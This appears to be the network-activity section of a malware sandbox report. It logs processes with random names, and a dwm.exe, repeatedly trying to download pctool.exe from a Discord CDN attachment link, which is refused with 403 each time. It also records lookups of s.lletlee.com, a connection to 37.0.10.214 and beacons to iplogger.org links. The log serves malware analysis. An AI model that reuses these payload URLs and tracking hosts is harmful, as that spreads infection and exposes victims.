IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:04 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=Sfa133.kOWxTN1YN._FpkmYh0HNgVNLUdVlcjsOnjUo-1708892104-1.0-AaLQT5UB7BWMOz1ZWO4ncvrmoxoYl8SdWlUHay6stDLOOtYVrFJRW/IsFlVfyGfqvkvlYVRmi5UUw2n/on3JF9k=; path=/; expires=Sun, 25-Feb-24 20:45:04 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=brhTi6X2FVgg3UcL7xWAkn5LPHzAjCov4UsCo57cCbQ9p%2FGyqGG39hjoaawjwcDc%2BQstUoXhBjxpWEHtKylMSTmX4DqpKFmlAkCLKR5XRLZkVhtFRscJstrg3YelPBMvQtRIXg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=DuaXKhyEfDguxXOdVvuxB5X0JrQNPgN6ibBfAod.u_M-1708892104693-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29e464ffd79b3-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:09 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=wjKI6CV_zPp_3bGTVt0nLvdgL2IVkaS9M3KJM_Zd6Z0-1708892109-1.0-Af1B8CQoLwbi6h+enhXVMA1V0WmlaOo6i/laSFN5ONbXx01dd2pmJVecgcZN0/RY4JKE+1NdbDu8+1YodQDpQDA=; path=/; expires=Sun, 25-Feb-24 20:45:09 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=erYX7%2B2F%2FgO%2Fa3uN%2B2S0uBCHk%2F1Vic5ktIJXu8VPgKD%2FBvzhwccXjV0%2FiCfS9CEFsIUC5urt%2FpPKr10hmjXHjjan8fKa9%2BqKwkTSdCQWC3lPYTkWlDn0IZdsPZoaR4t%2BNj1rpA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=mwx2AV2rjyOLY7DKEIq2unpGUTAHNlTKhpNJ_RQQIlA-1708892109775-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29e660f0e23d0-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:14 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=EJBe2d5sBOz9pJwq5B6MqIkQKS1CdslGUmCUO3s7Ovo-1708892114-1.0-Ae/A3hsWQCBnHdPkZdjGQAD6s5kWivtiOwoAs8hv2KI3fXnq8KzKIXDTK0FCaWgqqxk9x290qtxqdNQ67v1G7r0=; path=/; expires=Sun, 25-Feb-24 20:45:14 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vQrZI%2BNkpTKJqcIg9pOVFlt1M9ocsI%2Fhvgv6RKTmaILt34g1gM7NiG3Fh%2F6Ffa2SFHxTGeEkPEa38xkrE69549%2Be9VIyCvE4zQRgarQNL%2BO2AI9YdV%2BVTLLg9%2FIC3OFsE6L77A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=XiP8Id92RDoeY3_WtohGuAJ8K0m7siS7U8fCiNgNQEk-1708892114854-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29e85ccef6430-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:19 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=LVzxCo9c_OMvEkngSMwB2QU4Y1bXRZshMiW9kIyT9Yc-1708892119-1.0-AYkB6casAoI4+JpDLzVhGqunQ/rzm49KeHKxcZcbCS0qidasnYiBHTsasU9s9TC7efcMP8PhDroWUZMUWebQ3qA=; path=/; expires=Sun, 25-Feb-24 20:45:19 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lz9IpgHAyJ%2BpT2EILH4Pa8CiRR6%2FNEo2%2BQU9DmWoG6JxxiAlD48NZdy%2FBjj2ShWQxN8%2F1gREjLhEWcqiOjODfC4laz75P8JoxMyfw9f3tcCEhGChFS8nQYY4qM6nMDzwxTWCug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=sn2_QcZrVikuSRdvhy1bL5iB3iYQtDTbryuFkFNEQHc-1708892119931-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29ea57c57631c-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:25 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=o_SEu2wie4dXKzLnjQ2Y0k0PjZtaLdwvTLeK2RdtOyI-1708892125-1.0-Ad4JC4hAUahXcMIO2ayhzsBNtsnga3I0eH2BtyrRKMZO2diBGKnTaFKZNliG67UjWZ4mrUV54ef/KzPl3Vq3jcY=; path=/; expires=Sun, 25-Feb-24 20:45:25 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ra1pjD%2FzvFGGdHWFRnyOss0A0KoRgONO%2FnoY2yVQ96emKfE1jcKa0T6JvKfwwjZ2U9%2F2ahprcLJeSnGT5jdbZWcU9WI6C4%2FXmoeJKBPQd1%2Fn%2FUoKN51n5TKTA1%2B8iyqsnnDl7A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=M.3NIGbwCnqO1OuQVt_EopRZP.7nIPyZIb9wmjQK8Hs-1708892125008-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29ec53c64dd7e-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:30 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=AaND8t308Bc6yeSTKNcY3v.5njyr459j8XC9CbLteWU-1708892130-1.0-AUDOI/yYFqO+HlRKqgQFDNcSVg3vlulMqBa6ptdaFXP9xK2eavtcgOZGOzJ7nXaf6hW5ipH5c17lDNQ2utKYZpQ=; path=/; expires=Sun, 25-Feb-24 20:45:30 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VuEIOuwnX6Q6ODI6kllu8Z1MRXfJMjEaR1BP7byJ3Yc80xgbq2Bn7xzjcoDIJJWdpZ3gJib63%2FbWYDNkq%2FXGyU%2FOkn%2Fp8ryvYzh8609Nd195CIgAjiIDgLX4yNgFdwynKr5hGA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=cni_s5G5U8Mw0foVcrCWk0CA6dZtaIlCP1hVnqpoe0E-1708892130100-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29ee508106531-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:35 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=DacmS8DWLk65Dfi3nTBnivYn7lAFLwyjszM2s9xcxOk-1708892135-1.0-AfEXLY00BGdWPpTN/0m9w3osORUqrlfNsO+S8MnjCn+iKI1+zbeMu9Pt7CSjSqX498hCJhsRBRfb5DgNUURtF7w=; path=/; expires=Sun, 25-Feb-24 20:45:35 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o6U8ys7LR4coiOp3zQIOrDp%2B30enVun4xWI9%2BPhDKprAIlVJyZSh%2B3bN8g4shlFJB4TdrTK2MOXkHYta5dG8CBgJjNOoSElLgk5KlMoW95qsvhB%2F9ePmNMPEFdpZH5BUwVhFNA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=dgApHJLML.MWoXmD4pGXNzLKnXaTcyYIXiMIDtoc3rw-1708892135178-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29f04ca3f77ab-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:40 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=QGio0wPRERjEerAu3.fHPmVovR7HAt89nQRvsPNlKGM-1708892140-1.0-ARozZ8sR/XooWBSEKA4nKkjS3vxwdb3Sp5+DnsXnX25ZVckfPMb9YSziQkKXt8M3ygeXh1JYcW3XBth6aDcsFnU=; path=/; expires=Sun, 25-Feb-24 20:45:40 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b1PZ9N5Uh0VS1ojBg9xSSksDnJOh8vadkRHVzJ3r4WoYaZoyCkNgR3m3r0gTqClFIzFkoxd00SNFg7fLSuwV05JlT%2BCUSkT9k3ttxMrztdog9l4bvvbrgC4NhR9KcerHG6f1iA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=2Nv.rBj0Zo3.7jJrjhDD8ijUwk4kDEMYYup84fd7mkc-1708892140253-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29f2488ff6367-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:45 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=clU3Ev6TnH0iqiqeOtN2j.0Iw_y4xyTtJ4RRVgcUnhw-1708892145-1.0-Ac039LIYtNNSSyQ1Pt3BEDMyis7v9AYrGa2CfX7DUxrx+p9E8xSK1jyb8PFT4lEGGPX+2Krqc1DMIHlMMDV2g9o=; path=/; expires=Sun, 25-Feb-24 20:45:45 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DDCt87DXWoZJxAyisGxUHBivaMsO9YAfLaBZ%2FDP1qm0ALFtkO0hcNjW%2FMcDKpw8PGv%2BTq%2FZOK53s6cEGr9%2BBrF%2BhNZjSbtx6Roz1jFn9T8qdevbDP5yRZg%2BQbukE2AV1VgYzZg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=lp8YWHf.xZPzl_IyOQ9hLYbdoNKuezsJH558JbT6Mgo-1708892145344-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29f44491c63ea-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:50 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=tqpxPVRRrh.k2ZANJK8GZJ89PQjgZjRnjnv2hw.6ycU-1708892150-1.0-AYXm3XlfkNOMieX8nCxjsc7qMaJYA89GcPLox8IoB3PatE2IlRMKRDwhbKlPVghudiX+uuTYGQ6XyFv/dcRKQME=; path=/; expires=Sun, 25-Feb-24 20:45:50 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oQUcZ1%2B7%2BofAwFxH7rZJuNRVdJ4hcqBjkOK3ezJ8EgYfnwZgTNpqrCo9Dltm0kmwwNSZ8EwRdbMK3THZasgi3d%2FgMS7xYPDdrxOYV8A5BQEFs2JSqCiWxjQNxi3mAhS94XQarQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=yZHNxSlq4oTWgv5DltpMxR2BbG_kCMn4VSoQifML7SY-1708892150428-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29f641c3d639a-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:15:55 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=Qs3Oziy0IWlvd16rZDcrpuPcuAZZUrP0YGV2Eyr53Ko-1708892155-1.0-AYQHgkCCofwbSwVyIus4yEj5D7e7rHCGrOViNfh8CH9/KwJ9BzEFy2EoQ0aewoDF8aI50EPddYluyx5oLbnv+M8=; path=/; expires=Sun, 25-Feb-24 20:45:55 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GJbX9d4kaeeGzBW589sfWsMJH4eJqJ5q1my3GfUb2YKQFLZezcFKLp5myOVlYep%2Bq1XftAJ3WZr%2FCOjo5P0Q7eawdun%2BPM1tYC%2B71X0z7lzLoDv5muKKo4gRyoGW6WwThEI30A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=8F7xvWqmRcJeqU_GxMWgjKGDQKfIblfn21flxxDS2WE-1708892155510-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29f83d9be886e-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:16:00 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=x.Vge47iQ1PQk8J7dqv2nDSslqmURlgETjdyA655XGY-1708892160-1.0-Aedru0Mvf8T1EYKBqLEn9ql6Xt124+4js409ARYuS+sLsei77qW0/vSlJ7xQ5KmKnep2AHYmb/vpygQoQbn0/AA=; path=/; expires=Sun, 25-Feb-24 20:46:00 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=njbNENFsheoS9ZzIpFV%2FImFyHyM21L%2FRam%2BEwXyrgMi%2B4AXt9yck1J%2BfqIbTzWDWY%2FQ5IjdxvxXH4bye3oVhHkjXxoRWmBntvhfTinjMnA35ECF1Afx4Zm180n%2F87mgvuu2YrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=GptD.QEOUCP7JAanAZa_67j4f0vFRl4.BiZUluHtk0Q-1708892160601-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29fa3be1463ea-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:16:05 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=B.5Mu.qRHaZCK6DMq3cApQ99dOC_92SKNrNSg6yCUDE-1708892165-1.0-AX5Crj65vOOPQOV+WZpJeV3fDgcxL3Zd0qvmnss0wLZhBfLIPxZik9nNTLhOVozxqv+ZZXyqcZIKw1NYBON6DhU=; path=/; expires=Sun, 25-Feb-24 20:46:05 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l6WuS9yBvkjhXXo%2F%2B28ztGwdPKujuxnzBULZs4N5q9PJkFIU7cee5Dyh72ScULLM75jyGpiAvs6MweCJGXGjpIytYAQXiz9AefuG7lp%2BCP%2F2SRow7nYzaDgJPhkMGdWK67aSBg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=1_DoTFD2.xr9TaX0jkQBg8kTVLNw4vOO1nUuXOx.VBk-1708892165689-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29fc36dc0d174-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:16:10 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=_0r7zyDB8aniRTsvvIgPjVS2vhK96hgu4jgVhwNJZZw-1708892170-1.0-ATEFspdutSYo0pVhy/FtloWf6Y3VW9yxmpZ6QWUXjPfFGS8Zyae7LC3fPtI4h/v8ITZMap//ueFiMKyz79lLmZE=; path=/; expires=Sun, 25-Feb-24 20:46:10 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfBUUgsQ8OPvQXFA4ASMrnpsuxH3HTmWzrm43oO0awZidmPVYfBsWaHO6Ru2XSE0ifpwQSkRQhz1dDkAtsoY7Zmebw46bKsZj4ZslaiThDKw7jwfWVQU%2FtlajgkMwZyT62r%2BPA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=zOUW3Zh0ZTrJS.jsBx7f8ur4xfLEOBG42MUQku4efpk-1708892170770-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29fe33f1b79be-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:16:15 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=jIOSsQ_BKSOkwAYU7_JGIj39Fg.Fs0tLJxif_dKHU8s-1708892175-1.0-AdWydecucQDLQLyKjDirgB6uKQsuRkVZ2NLQUQ36fj6lAYz0HmRNISJG+KjzScOwzX/0IWiDoi2Wr/2fJ3FroqM=; path=/; expires=Sun, 25-Feb-24 20:46:15 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t0OPJcLxPmkOhIK6mGkS7BJFFZfEM1T1K6lMxf4yN9XsZOhp2Az6i44e9rZOD0mj14mkVhPBNElJ0RVZwPE307H69X1yqH0N0RRD0BOpNsJRnaphFDYCFl70KHuvZKMMr1oKkw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=7xabJZcJi0LkEppRjBR1F5YXuuxaEWuO3.njXJtNPHs-1708892175856-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b2a002f91d23ff-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:16:20 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=.LpnE2_JB_zwqwsqF.YQwiSmfHUJW8KdkqFB70qwA7Y-1708892180-1.0-ARmDTJmKDrOnhu04zXCtvUoqcChKAihQf2oWy49oHlwTtSDRY36AVkifKtcndtvg7SOuc6eJNlDTPuRulSHLQx8=; path=/; expires=Sun, 25-Feb-24 20:46:20 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OQTaE%2B71PbRpeWuyfRI9Hmr3eyXHYRs%2BYUiMDlZ3FyNdOv%2BHmZGwJ4DFXAfeURGZxp94v0cIXGFjKOWKdWBZe5fK4unN37JLIyZ6iAb%2BEZnPT3Z94qMFku5TtF0ala3dNVTvog%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=XRf8N3ctHljcIEZkPVWBeUe_yhfWS7mGnWIV7BXQxBg-1708892180943-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b2a022da080666-LHR
alt-svc: h3=":443"; ma=86400
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:16:26 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=HD1xqi0n8fIBc11aFEvKW.xV.1Va0z103c.Y5q2TYEU-1708892186-1.0-Ae+OXNphsr7LX0a2oY2L2IBEY0yajGhREjVcpP3vBLLGP4bWdwP5HCnJVGZwcYb6BfIGLIB64IdjVDU+4Su037s=; path=/; expires=Sun, 25-Feb-24 20:46:26 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kwzd61jbEHMbFFz76cyUXhuawYZWc59SPTBn25SYkTF6LC%2B70yxD6KsIbjpf7Dw1u8ZSDWMRnYwq%2BMqugRg5b0zprkjubB5prxq%2BKjqXXWuDIBQKVu2Acw7GaiUrU6bX479YOA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=vA7m9oeT8Yp09gIciAJ.pNY1LJZEG.6wt30Cl5wutgw-1708892186033-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b2a0429b7f652b-LHR
alt-svc: h3=":443"; ma=86400

162.159.129.233:443

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

tls, http

Wed01e6754f9438ea6c7.exe

786 B
4.2kB
8
7

HTTP Request

GET https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

HTTP Response

403
37.0.10.214:80

Wed0187dd5121696b.exe

260 B
5
104.21.4.208:443

https://iplogger.org/1SPHi7

tls, http

dwm.exe

784 B
6.2kB
9
10

HTTP Request

GET https://iplogger.org/1SPHi7

HTTP Response

200
104.21.4.208:443

https://iplogger.org/1vpFz7

tls, http

dwm.exe

898 B
10.1kB
9
13

HTTP Request

